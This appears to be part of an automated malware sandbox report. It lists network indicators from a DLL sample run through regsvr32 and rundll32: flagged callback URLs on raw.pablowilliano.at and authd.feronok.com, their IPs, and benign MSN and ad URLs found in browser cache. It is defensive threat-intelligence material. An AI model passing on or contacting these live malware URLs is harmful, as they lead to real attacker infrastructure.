http://raw.pablowilliano.at/fNUjDf7_2/FCXdH_2BoIzulRdpyRrN/VegwLwgBgX3FZ3e7Kml/JNpfVfiUw9hrvE_2BrMey8/9KmQXXHW4gs3a/9wgniy83/wKdGA8aJWZ5vZIo_2FiHAUb/zP0hJ_2BZH/ieJtaC2qsJk3_2Fow/0ttQYgmKdzve/ExwbYpZnP5c/82RPIPzJe1gOLF/_2BRc7ZeEUGg3SmE1TpuS/gPPWxB_2BjL0KDQa/cEkcJSpFensONz2/JuZCF1CCARKPWeUk_2/FvcrH8CIA/yx05ZSmlcDL9ZKkPz_2F/hnEgW0PJ8VaXmVS3OM5/DCOZcdQW8DmkgDTa3ilYTz/BNbEyiVfi1Qod/CczdZH_2BY/L	100%	Avira URL Cloud	malware
http://raw.pablowilliano.at/eRS3IPULaBVyyyM8SI7NTjn/bu9jriHj6t/_2BkcuH0S0KLaBS3B/vkCN9MDcpDQw/CXvn1U	100%	Avira URL Cloud	malware
http://raw.pablowilliano.at/fNUjDf7_2/FCXdH_2BoIzulRdpyRrN/VegwLwgBgX3FZ3e7Kml/JNpfVfiUw9hrvE_2BrMey	100%	Avira URL Cloud	malware
http://authd.feronok.com/1rDskZrGyxwYpYn35/qL0_2BW8aSJn/Xmy8O6y_2F1/vAFFg5sXvrqV3E/5sQNlqY_2FlVqYGBdfPFn/U_2FpF45FRVvtng0/CHSrG3ox4kKO6nz/fa8Bk9I48YJ2mibVvx/L_2Bqol7c/tsQwCAooqkWn6gPAbSWl/QD3zhXOtMzYL6Ym04zh/5_2FgybkUk94HZTf6olCIq/9FN98evTn58b0/8CSSre_2/Bu6Ikb6rwvx1DWohv5RLt4o/e_2BWF_2Bc/d5_2Fp_2BgsUfGW3Y/Tgn5X_2Fo_2B/ZZIMFZgAKXa/ZNoVGytLkCHCdG/XBDYst2ree/Zgtmz5W2Tq8P/H	100%	Avira URL Cloud	malware
http://raw.pablowilliano.at/5Fz54n1eAYCx6AoO/trrrFlnJO43_2BT/_2B9XA2Pfv_2FjB9cX/4bvHDQr_2/Fcc1l6ZYgU	100%	Avira URL Cloud	malware
http://authd.feronok.com/tTVUy7Cis4PjZzw3zlK90/992fZ2V2UadpUOjx/ZlFfFNzzz_2BNMC/rw9ORkrACS_2FSnAjs/_	100%	Avira URL Cloud	malware
http://authd.feronok.com/1nQie4cgyK/6CobqL4Gvl8jR0Ryb/ykQvmHPc_2Bj/I998g1woMmU/tlTJlg0yLjL6kY/_	100%	Avira URL Cloud	malware
http://authd.feronok.com/ATiL3P87_2FBLJR/BC5BJn8dyTtQ6ffd5W/0yM3sHqjA/PUUhyvXz10qPy3rbOoEV/mxXTz5GEf_2FJ1a_2BK/ZfrLOk2W31qhtbg9JWUwPE/hN5bUcB50eKT_/2BNd8E_2/FZi_2BFfGni4E2JjnbevSKB/8h9tWV54XR/zR1VMEFW8ZFskTIvF/Gph5WUak2QX5/sVOcmn1nNvc/RnK_2B00CLgf0I/K7lgIJJ7sya5Al4fACOfm/BvxQs3fAG6a0MebC/NKtDiZMQRT60IUJ/f0dP0RsUXiNDqIW54v/LL56Tq1vM/s_2FlHH5u86U7q76_2Ft/4GmpUkuUY0whYNq9pWf/DCuUzAdQ/8	100%	Avira URL Cloud	malware
http://authd.feronok.com/1rDskZrGyxwYpYn35/qL0_2BW8aSJn/Xmy8O6y_2F1/vAFFg5sXvrqV3E/5sQNlqY_2FlV	100%	Avira URL Cloud	malware
http://authd.feronok.com/L_2BDt9ytUk/uJ29Pz3DiT6ki3/08jXqEr2Bw1VZtjZ7PHMr/mkp8mx2j_2Fh_2BM/48r5Iz6Z2	100%	Avira URL Cloud	malware
http://raw.pablowilliano.at/ds3WDeXoOEmk7Y/QQuMPDNsrQWDpsNbTxUBm/9C_2Ffsfwo9FuQBR/xjorKLEJMlfL0A2/CNDB50xXgmy2p4EWxn/DaMjDghfb/cWK8m8ncHHGRZhGMepDc/nDGGUvCSKIWD73abwqz/PSlYxoNGoul9uvoUM2lkYp/iUEvsJec7I6HC/9f5WLr8u/422hTa5FmMbzsZrrYeL5ZCh/Hr1urRNWuy/StfzJRwO7PFWr_2Ft/9TWK1WqIM09Q/q8nrTS3QqnI/jfRzgUIatEJnmp/MqYnHLVMk2JoJoUVcpg0A/FnIEAZIY/9xBtC9wkdw5/g	100%	Avira URL Cloud	malware
http://authd.feronok.com/ATiL3P87_2FBLJR/BC5BJn8dyTtQ6ffd5W/0yM3sHqjA/PUUhyvXz10qPy3rbOoEV/mxXTz5GEf	100%	Avira URL Cloud	malware
https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?"	0%	URL Reputation	safe
https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?"	0%	URL Reputation	safe
https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?"	0%	URL Reputation	safe
http://raw.pablowilliano.at/5Fz54n1eAYCx6AoO/trrrFlnJO43_2BT/_2B9XA2Pfv_2FjB9cX/4bvHDQr_2/Fcc1l6ZYgUI7p_2FiVc6/t_2Fl8EaBR1HS_2BNK5/X8y72xR2qjkHaZyrNERbO7/v2peyintdJ24L/Yw8tw7QT/dLXZu5OFhvWbL455USn4LnJ/HMP0smJj_2/FZwXFbprpV3aJCWuX/15bJnANkFNAX/hVoXLTlCLIU/tXHaEx0muHiXJx/btyId5nqGgZC05fEhjIaO/rm6z0UiaoPx_2FiX/TGKuABuP8srX2Ck/eUAi3TXKVNasxDo0P3/laW2oibPa/zBY4kInj1Zn68Xf49Wvw/7KJZdF0VpEe/P	100%	Avira URL Cloud	malware
http://raw.pablowilliano.at/OH175Zchtr5XCiZumX3nwAg/_2FAbOw7Yf/Z3HrOA2tCuHkK0wx_/2BSl8k36vM_2/BmUwT9vi5ds/IzgeuD6q87gFwZ/84qOsYKFhKxVr6L0Cag3l/PL1RiNFP_2BXA4Cd/ksDe_2BH0hSy4qr/ZjPn7VhnaRpwImnOZ4/d0Piqs_2F/AJoXR13SZzOA0tqrByvJ/vMFrOLoWX0owBj80j0g/nPQR2b2kCMyMldOZ2WWvYd/aoe4QO8ibbCp3/q_2Bre6L/dJzbiZ3n5z4pEwkiyFez6gn/uNwx7h8FiM/chP3D4vmodPyh8n0y/tjNup8GzZEvE/7l7rBmGdOaq/dgKOoGhW3lw/NG	100%	Avira URL Cloud	malware
http://raw.pablowilliano.at/V0Zdil_2B8IErAOIy/9Ot8_2B759bg/T54gq_2BJbB/fEKg5_2BdBbLTl/sPD_2B_2F	100%	Avira URL Cloud	malware
http://authd.feronok.com/1nQie4cgyK/6CobqL4Gvl8jR0Ryb/ykQvmHPc_2Bj/I998g1woMmU/tlTJlg0yLjL6kY/_2Fb8S	100%	Avira URL Cloud	malware
https://onedrive.live.com;OneDrive-App	0%	Avira URL Cloud	safe
http://raw.pablowilliano.at/favicon.ico	100%	Avira URL Cloud	malware
http://raw.pablowilliano.at/	100%	Avira URL Cloud	malware
http://raw.pablowilliano.at/5rrnAaWEJjP00b_2B56737/B1AfZAlhUgHoA/b2t_2BN4/l5OkLy1VlWuDrrdEILRWWeb/E6	100%	Avira URL Cloud	malware
http://raw.pablowilliano.at/ds3WDeXoOEmk7Y/QQuMPDNsrQWDpsNbTxUBm/9C_2Ffsfwo9FuQBR/xjorKLEJMlfL0	100%	Avira URL Cloud	malware
http://raw.pablowilliano.at/OH175Zchtr5XCiZumX3nwAg/_2FAbOw7Yf/Z3HrOA2tCuHkK0wx_/2BSl8k36vM_2/BmUwT9	100%	Avira URL Cloud	malware
https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json	0%	URL Reputation	safe
https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json	0%	URL Reputation	safe
https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json	0%	URL Reputation	safe
http://authd.feronok.com/1nQie4cgyK/6CobqL4Gvl8jR0Ryb/ykQvmHPc_2Bj/I998g1woMmU/tlTJlg0yLjL6kY/_2Fb8SL1e_2Bcy1brJLJ_/2BjovsduMdCqU0x4/GQVR4nMtPLQI34Q/jvoS0v2ZfIuYqB_2F9/H14dXc2_2/Bjq_2BEdNrJJI2sl8dBd/0EXv2jUPwYTVqmYCs_2/BvSZuMChVtYZMZS6DsVwap/yVgW08_2Ff8kL/trSm6I_2/FftLBTNnGuYda0Kts3xBoIq/hS7V_2FgQN/zYOOceAjlTgUyD0tU/GveuM_2F9QKt/Dw_2BirtM_2/B5GjUkddBSdTKK/gGHOev3Y5/fKlghW	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
contextual.media.net	23.57.80.37	true	false		high
authd.feronok.com	34.95.62.189	true	false	10%, Virustotal, Browse	unknown
tls13.taboola.map.fastly.net	151.101.1.44	true	false	0%, Virustotal, Browse	unknown
hblg.media.net	23.57.80.37	true	false		high
lg3.media.net	23.57.80.37	true	false		high
raw.pablowilliano.at	34.95.62.189	true	false	9%, Virustotal, Browse	unknown
geolocation.onetrust.com	104.20.185.68	true	false		high
edge.gycpi.b.yahoodns.net	87.248.118.22	true	false	0%, Virustotal, Browse	unknown
s.yimg.com	unknown	unknown	false		high
web.vortex.data.msn.com	unknown	unknown	false		high
www.msn.com	unknown	unknown	false		high
srtb.msn.com	unknown	unknown	false		high
img.img-taboola.com	unknown	unknown	false		unknown
cvision.media.net	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://raw.pablowilliano.at/5rrnAaWEJjP00b_2B56737/B1AfZAlhUgHoA/b2t_2BN4/l5OkLy1VlWuDrrdEILRWWeb/E6W61j9yq8/abuhFDsODTcGxVnWQ/E_2BE3e1OTvy/3WD7TSUbyOm/cpm4396P_2Fjd0/pOy7riIEzmJp_2FxZmWLM/gNpof3_2FnlsfWUd/1743QqIgg_2FQRu/ZKVtHnC8C1xvmv_2B8/vHh2F1obc/m3eV0F3yYMczZiknu1Ew/H6Bi_2BTSpyXLXazxZH/wg8NqLvm2lSF1HlaU3pANa/1U6Z_2BZLYJJ_/2BlaNQcq/ledo9CFvcm_2F6MjGWcFo9L/RAKX4mmp_2/F_2FxtA6ZOAujrSBZ/4yu9h7z	false	Avira URL Cloud: malware	unknown
http://raw.pablowilliano.at/eRS3IPULaBVyyyM8SI7NTjn/bu9jriHj6t/_2BkcuH0S0KLaBS3B/vkCN9MDcpDQw/CXvn1Uc9Lk5/eTvtAYmWtMxfAC/IbcZg8p7Nqfw4xi6JFwgY/iX8lYPiI0RfUKruW/cRS7MvLhOTcIXvx/A_2F5SdmT8BNOtLhIu/P7uLQkYdw/iuMR5Z51enQS4ZwsoBTP/Dtp84_2B7PB4d6Ih_2F/AlW2oiOiFE_2FnyCSEdY9y/vWCqa6t9PLYnR/oBTHljmW/b1W1259HTZYZTaG9O2900Q0/yz_2FOFMzC/llouIHAJZHwF3f0aR/_2FSLB7YfaTL/BdH925d4dS3/7iDYe3o7fiS/Pl	false	Avira URL Cloud: malware	unknown
http://authd.feronok.com/tTVUy7Cis4PjZzw3zlK90/992fZ2V2UadpUOjx/ZlFfFNzzz_2BNMC/rw9ORkrACS_2FSnAjs/_2FkBi36_/2BcKHehCiVzJ0ZlxZwUe/L605o3IJbqARL43QjWI/5xKrHdjyff8x2rKCgmO7Mu/SD9GyKc_2FBsi/PnW3TDEt/vmXdCw3sFAveNrYKm6TcRex/ohSiZG5THC/3RxSnoz2RW1R2SJHo/_2BwMcdQnslY/eZbgGLoqDt1/hcHL1ijHz1HAC4/B1wguCo7y8KJKFrVLMood/ADnIvNjKfSqFXvOX/vfzJTRrlv1hKd_2/FiJ_2B9pSc20z1/m	false	Avira URL Cloud: malware	unknown
http://authd.feronok.com/favicon.ico	false	Avira URL Cloud: malware	unknown
http://raw.pablowilliano.at/fNUjDf7_2/FCXdH_2BoIzulRdpyRrN/VegwLwgBgX3FZ3e7Kml/JNpfVfiUw9hrvE_2BrMey8/9KmQXXHW4gs3a/9wgniy83/wKdGA8aJWZ5vZIo_2FiHAUb/zP0hJ_2BZH/ieJtaC2qsJk3_2Fow/0ttQYgmKdzve/ExwbYpZnP5c/82RPIPzJe1gOLF/_2BRc7ZeEUGg3SmE1TpuS/gPPWxB_2BjL0KDQa/cEkcJSpFensONz2/JuZCF1CCARKPWeUk_2/FvcrH8CIA/yx05ZSmlcDL9ZKkPz_2F/hnEgW0PJ8VaXmVS3OM5/DCOZcdQW8DmkgDTa3ilYTz/BNbEyiVfi1Qod/CczdZH_2BY/L	false	Avira URL Cloud: malware	unknown
http://authd.feronok.com/1rDskZrGyxwYpYn35/qL0_2BW8aSJn/Xmy8O6y_2F1/vAFFg5sXvrqV3E/5sQNlqY_2FlVqYGBdfPFn/U_2FpF45FRVvtng0/CHSrG3ox4kKO6nz/fa8Bk9I48YJ2mibVvx/L_2Bqol7c/tsQwCAooqkWn6gPAbSWl/QD3zhXOtMzYL6Ym04zh/5_2FgybkUk94HZTf6olCIq/9FN98evTn58b0/8CSSre_2/Bu6Ikb6rwvx1DWohv5RLt4o/e_2BWF_2Bc/d5_2Fp_2BgsUfGW3Y/Tgn5X_2Fo_2B/ZZIMFZgAKXa/ZNoVGytLkCHCdG/XBDYst2ree/Zgtmz5W2Tq8P/H	false	Avira URL Cloud: malware	unknown
http://authd.feronok.com/ATiL3P87_2FBLJR/BC5BJn8dyTtQ6ffd5W/0yM3sHqjA/PUUhyvXz10qPy3rbOoEV/mxXTz5GEf_2FJ1a_2BK/ZfrLOk2W31qhtbg9JWUwPE/hN5bUcB50eKT_/2BNd8E_2/FZi_2BFfGni4E2JjnbevSKB/8h9tWV54XR/zR1VMEFW8ZFskTIvF/Gph5WUak2QX5/sVOcmn1nNvc/RnK_2B00CLgf0I/K7lgIJJ7sya5Al4fACOfm/BvxQs3fAG6a0MebC/NKtDiZMQRT60IUJ/f0dP0RsUXiNDqIW54v/LL56Tq1vM/s_2FlHH5u86U7q76_2Ft/4GmpUkuUY0whYNq9pWf/DCuUzAdQ/8	false	Avira URL Cloud: malware	unknown
http://raw.pablowilliano.at/ds3WDeXoOEmk7Y/QQuMPDNsrQWDpsNbTxUBm/9C_2Ffsfwo9FuQBR/xjorKLEJMlfL0A2/CNDB50xXgmy2p4EWxn/DaMjDghfb/cWK8m8ncHHGRZhGMepDc/nDGGUvCSKIWD73abwqz/PSlYxoNGoul9uvoUM2lkYp/iUEvsJec7I6HC/9f5WLr8u/422hTa5FmMbzsZrrYeL5ZCh/Hr1urRNWuy/StfzJRwO7PFWr_2Ft/9TWK1WqIM09Q/q8nrTS3QqnI/jfRzgUIatEJnmp/MqYnHLVMk2JoJoUVcpg0A/FnIEAZIY/9xBtC9wkdw5/g	false	Avira URL Cloud: malware	unknown
http://raw.pablowilliano.at/5Fz54n1eAYCx6AoO/trrrFlnJO43_2BT/_2B9XA2Pfv_2FjB9cX/4bvHDQr_2/Fcc1l6ZYgUI7p_2FiVc6/t_2Fl8EaBR1HS_2BNK5/X8y72xR2qjkHaZyrNERbO7/v2peyintdJ24L/Yw8tw7QT/dLXZu5OFhvWbL455USn4LnJ/HMP0smJj_2/FZwXFbprpV3aJCWuX/15bJnANkFNAX/hVoXLTlCLIU/tXHaEx0muHiXJx/btyId5nqGgZC05fEhjIaO/rm6z0UiaoPx_2FiX/TGKuABuP8srX2Ck/eUAi3TXKVNasxDo0P3/laW2oibPa/zBY4kInj1Zn68Xf49Wvw/7KJZdF0VpEe/P	false	Avira URL Cloud: malware	unknown
http://raw.pablowilliano.at/OH175Zchtr5XCiZumX3nwAg/_2FAbOw7Yf/Z3HrOA2tCuHkK0wx_/2BSl8k36vM_2/BmUwT9vi5ds/IzgeuD6q87gFwZ/84qOsYKFhKxVr6L0Cag3l/PL1RiNFP_2BXA4Cd/ksDe_2BH0hSy4qr/ZjPn7VhnaRpwImnOZ4/d0Piqs_2F/AJoXR13SZzOA0tqrByvJ/vMFrOLoWX0owBj80j0g/nPQR2b2kCMyMldOZ2WWvYd/aoe4QO8ibbCp3/q_2Bre6L/dJzbiZ3n5z4pEwkiyFez6gn/uNwx7h8FiM/chP3D4vmodPyh8n0y/tjNup8GzZEvE/7l7rBmGdOaq/dgKOoGhW3lw/NG	false	Avira URL Cloud: malware	unknown
http://raw.pablowilliano.at/favicon.ico	false	Avira URL Cloud: malware	unknown
http://authd.feronok.com/1nQie4cgyK/6CobqL4Gvl8jR0Ryb/ykQvmHPc_2Bj/I998g1woMmU/tlTJlg0yLjL6kY/_2Fb8SL1e_2Bcy1brJLJ_/2BjovsduMdCqU0x4/GQVR4nMtPLQI34Q/jvoS0v2ZfIuYqB_2F9/H14dXc2_2/Bjq_2BEdNrJJI2sl8dBd/0EXv2jUPwYTVqmYCs_2/BvSZuMChVtYZMZS6DsVwap/yVgW08_2Ff8kL/trSm6I_2/FftLBTNnGuYda0Kts3xBoIq/hS7V_2FgQN/zYOOceAjlTgUyD0tU/GveuM_2F9QKt/Dw_2BirtM_2/B5GjUkddBSdTKK/gGHOev3Y5/fKlghW	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://srtb.msn.com:443/notify/viewedg?rid=9ecc1772ef804391b1937a727e8fcb51&r=infopane&i=1&	auction[1].htm.6.dr	false		high
http://searchads.msn.net/.cfm?&&kp=1&	~DFF80766C3FDE4D880.TMP.4.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172	de-ch[1].htm.6.dr	false		high
https://www.msn.com/de-ch/nachrichten/coronareisen	de-ch[1].htm.6.dr	false		high
https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/unfall-mit-f%c3%bcnf-autos-beim-brunaupark-26-j%c3	de-ch[1].htm.6.dr	false		high
http://raw.pablowilliano.at/sX4dtwL7bay/rzZGwpnfzczFz3/LsBuX9huxqt_2FdLEMzat/b0BQWHIzHX0afe_2/FzCUWE	regsvr32.exe, 00000002.00000003.1070284695.0000000000C4F000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000002.1094093257.0000000000C21000.00000004.00000020.sdmp	true	Avira URL Cloud: malware	unknown
https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_promotionalstripe_na	de-ch[1].htm.6.dr	false		high
https://onedrive.live.com;Fotos	52-478955-68ddb2ab[1].js.6.dr	false	Avira URL Cloud: safe	low
https://www.msn.com/de-ch/sport?ocid=StripeOCID	de-ch[1].htm.6.dr	false		high
https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/26-j%c3%a4hriger-mann-stirbt-nach-sturz-auf-vorpla	de-ch[1].htm.6.dr	false		high
http://raw.pablowilliano.at/V0Zdil_2B8IErAOIy/9Ot8_2B759bg/T54gq_2BJbB/fEKg5_2BdBbLTl/sPD_2B_2FnvdcE	{24DDE3A9-C49E-11EB-90EB-ECF4BBEA1588}.dat.4.dr, ~DF2574ADFCE17069FC.TMP.4.dr	true	Avira URL Cloud: malware	unknown
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn	de-ch[1].htm.6.dr	false		high
https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel	52-478955-68ddb2ab[1].js.6.dr	false		high
http://ogp.me/ns/fb#	de-ch[1].htm.6.dr	false		high
https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-ss&ued=htt	de-ch[1].htm.6.dr	false		high
http://authd.feronok.com/dgzEbQ4OdHi6vrZ8TXtj/42P6D_2FQzGJBqjHjxr/k7tYCNr_2BHR8cgUzK_2Bs/fZKbEnCTwoi	{02B5BFEA-C49E-11EB-90EB-ECF4BBEA1588}.dat.4.dr	true	Avira URL Cloud: malware	unknown
http://authd.feronok.com/hmMzQKK9IpZemMI/AV6w9eELu1YSVPBd2B/U2fmYepaP/iI8O34L03l282SsJYJjt/THEo6G77t	{E30F6C06-C49D-11EB-90EB-ECF4BBEA1588}.dat.4.dr	true	Avira URL Cloud: malware	unknown
https://outlook.live.com/mail/deeplink/compose;Kalender	52-478955-68ddb2ab[1].js.6.dr	false		high
https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg	~DFF80766C3FDE4D880.TMP.4.dr	false		high
https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002	de-ch[1].htm.6.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn	52-478955-68ddb2ab[1].js.6.dr	false		high
http://raw.pablowilliano.at/eRS3IPULaBVyyyM8SI7NTjn/bu9jriHj6t/_2BkcuH0S0KLaBS3B/vkCN9MDcpDQw/CXvn1U	{09BC39C3-C49E-11EB-90EB-ECF4BBEA1588}.dat.4.dr, ~DFDAF305825D1F4F98.TMP.4.dr	true	Avira URL Cloud: malware	unknown
http://www.reddit.com/	msapplication.xml4.4.dr	false		high
https://www.skype.com/	de-ch[1].htm.6.dr	false		high
https://sp.booking.com/index.html?aid=1589774&label=travelnavlink	de-ch[1].htm.6.dr	false		high
http://raw.pablowilliano.at/fNUjDf7_2/FCXdH_2BoIzulRdpyRrN/VegwLwgBgX3FZ3e7Kml/JNpfVfiUw9hrvE_2BrMey	~DF9E90F1D74363A308.TMP.4.dr, {2BB8F01A-C49E-11EB-90EB-ECF4BBEA1588}.dat.4.dr	true	Avira URL Cloud: malware	unknown
http://raw.pablowilliano.at/5Fz54n1eAYCx6AoO/trrrFlnJO43_2BT/_2B9XA2Pfv_2FjB9cX/4bvHDQr_2/Fcc1l6ZYgU	{1081BFD7-C49E-11EB-90EB-ECF4BBEA1588}.dat.4.dr	true	Avira URL Cloud: malware	unknown
https://www.msn.com/de-ch/nachrichten/regional	de-ch[1].htm.6.dr	false		high
https://onedrive.live.com/?qt=allmyphotos;Aktuelle	52-478955-68ddb2ab[1].js.6.dr	false		high
https://amzn.to/2TTxhNg	de-ch[1].htm.6.dr	false		high
https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com	52-478955-68ddb2ab[1].js.6.dr	false		high
https://client-s.gateway.messenger.live.com	52-478955-68ddb2ab[1].js.6.dr	false		high
http://authd.feronok.com/tTVUy7Cis4PjZzw3zlK90/992fZ2V2UadpUOjx/ZlFfFNzzz_2BNMC/rw9ORkrACS_2FSnAjs/_	{1E26C961-C49E-11EB-90EB-ECF4BBEA1588}.dat.4.dr	true	Avira URL Cloud: malware	unknown
http://authd.feronok.com/1nQie4cgyK/6CobqL4Gvl8jR0Ryb/ykQvmHPc_2Bj/I998g1woMmU/tlTJlg0yLjL6kY/_	loaddll32.exe, 00000000.00000002.1094450430.0000000001220000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.1095495336.00000000030A0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.1095379754.0000000003110000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.1095372641.0000000002F80000.00000002.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://www.msn.com/de-ch/	de-ch[1].htm.6.dr	false		high
https://www.msn.com/de-ch/news/other/gr%c3%bcne-fordern-regierung-soll-zeitungen-f%c3%b6rdern/ar-AAK	de-ch[1].htm.6.dr	false		high
https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site	52-478955-68ddb2ab[1].js.6.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1	~DFF80766C3FDE4D880.TMP.4.dr	false		high
https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-edge-dhp-river	de-ch[1].htm.6.dr	false		high
https://www.msn.com/de-ch	de-ch[1].htm.6.dr	false		high
https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_store&m	de-ch[1].htm.6.dr	false		high
https://twitter.com/i/notifications;Ich	52-478955-68ddb2ab[1].js.6.dr	false		high
https://www.awin1.com/cread.php?awinmid=11518&awinaffid=696593&clickref=dech-edge-dhp-infopa	de-ch[1].htm.6.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&http	de-ch[1].htm.6.dr	false		high
https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin	52-478955-68ddb2ab[1].js.6.dr	false		high
https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb	de-ch[1].htm.6.dr	false		high
http://www.youtube.com/	msapplication.xml7.4.dr	false		high
http://ogp.me/ns#	de-ch[1].htm.6.dr	false		high
https://s.yimg.com/lo/api/res/1.2/V2crpAJeakj_9YEn1xys_g--~A/Zmk9Zml0O3c9NjIyO2g9MzY4O2FwcGlkPWdlbWl	auction[1].htm.6.dr	false		high
http://authd.feronok.com/1rDskZrGyxwYpYn35/qL0_2BW8aSJn/Xmy8O6y_2F1/vAFFg5sXvrqV3E/5sQNlqY_2FlV	loaddll32.exe, 00000000.00000002.1094450430.0000000001220000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.1095495336.00000000030A0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.1095379754.0000000003110000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.1095372641.0000000002F80000.00000002.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://onedrive.live.com/?qt=mru;OneDrive-App	52-478955-68ddb2ab[1].js.6.dr	false		high
https://www.skype.com/de	52-478955-68ddb2ab[1].js.6.dr	false		high
http://authd.feronok.com/L_2BDt9ytUk/uJ29Pz3DiT6ki3/08jXqEr2Bw1VZtjZ7PHMr/mkp8mx2j_2Fh_2BM/48r5Iz6Z2	{FC3DF8C6-C49D-11EB-90EB-ECF4BBEA1588}.dat.4.dr	true	Avira URL Cloud: malware	unknown
https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/k%c3%b6nnen-seil-oder-hochbahnen-z%c3%bcrichs-verk	de-ch[1].htm.6.dr	false		high
https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/wer-bekommt-im-kanton-z%c3%bcrich-pr%c3%a4mienverb	de-ch[1].htm.6.dr	false		high
http://authd.feronok.com/ATiL3P87_2FBLJR/BC5BJn8dyTtQ6ffd5W/0yM3sHqjA/PUUhyvXz10qPy3rbOoEV/mxXTz5GEf	{17550684-C49E-11EB-90EB-ECF4BBEA1588}.dat.4.dr	true	Avira URL Cloud: malware	unknown
https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me	de-ch[1].htm.6.dr	false		high
https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?"	de-ch[1].htm.6.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.skype.com/de/download-skype	52-478955-68ddb2ab[1].js.6.dr	false		high
https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header	de-ch[1].htm.6.dr	false		high
http://www.hotmail.msn.com/pii/ReadOutlookEmail/	52-478955-68ddb2ab[1].js.6.dr	false		high
http://raw.pablowilliano.at/V0Zdil_2B8IErAOIy/9Ot8_2B759bg/T54gq_2BJbB/fEKg5_2BdBbLTl/sPD_2B_2F	loaddll32.exe, 00000000.00000002.1094450430.0000000001220000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.1095495336.00000000030A0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.1095379754.0000000003110000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.1095372641.0000000002F80000.00000002.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://authd.feronok.com/1nQie4cgyK/6CobqL4Gvl8jR0Ryb/ykQvmHPc_2Bj/I998g1woMmU/tlTJlg0yLjL6kY/_2Fb8S	{17550680-C49E-11EB-90EB-ECF4BBEA1588}.dat.4.dr	true	Avira URL Cloud: malware	unknown
https://onedrive.live.com;OneDrive-App	52-478955-68ddb2ab[1].js.6.dr	false	Avira URL Cloud: safe	low
https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_office&	de-ch[1].htm.6.dr	false		high
https://clkde.tradedoubler.com/click?p=295926&a=3064090&g=24886692	de-ch[1].htm.6.dr	false		high
https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.dr	false		high
http://www.amazon.com/	msapplication.xml.4.dr	false		high
https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/eye-tracking-bei-online-pr%c3%bcfungen-keiner-%c3%	de-ch[1].htm.6.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1	52-478955-68ddb2ab[1].js.6.dr	false		high
https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&es=RCMAt1gGIS8WXc8APYp_ZOqKWxDwbRM5FCccwzTTz.S14TSo	auction[1].htm.6.dr	false		high
http://www.twitter.com/	msapplication.xml5.4.dr	false		high
https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway	52-478955-68ddb2ab[1].js.6.dr	false		high
http://raw.pablowilliano.at/	regsvr32.exe, 00000002.00000002.1094015467.0000000000BCA000.00000004.00000020.sdmp	true	Avira URL Cloud: malware	unknown
https://policies.oath.com/us/en/oath/privacy/index.html	auction[1].htm.6.dr	false		high
http://raw.pablowilliano.at/5rrnAaWEJjP00b_2B56737/B1AfZAlhUgHoA/b2t_2BN4/l5OkLy1VlWuDrrdEILRWWeb/E6	{09BC39C1-C49E-11EB-90EB-ECF4BBEA1588}.dat.4.dr	true	Avira URL Cloud: malware	unknown
https://cdn.cookielaw.org/vendorlist/googleData.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.dr	false		high
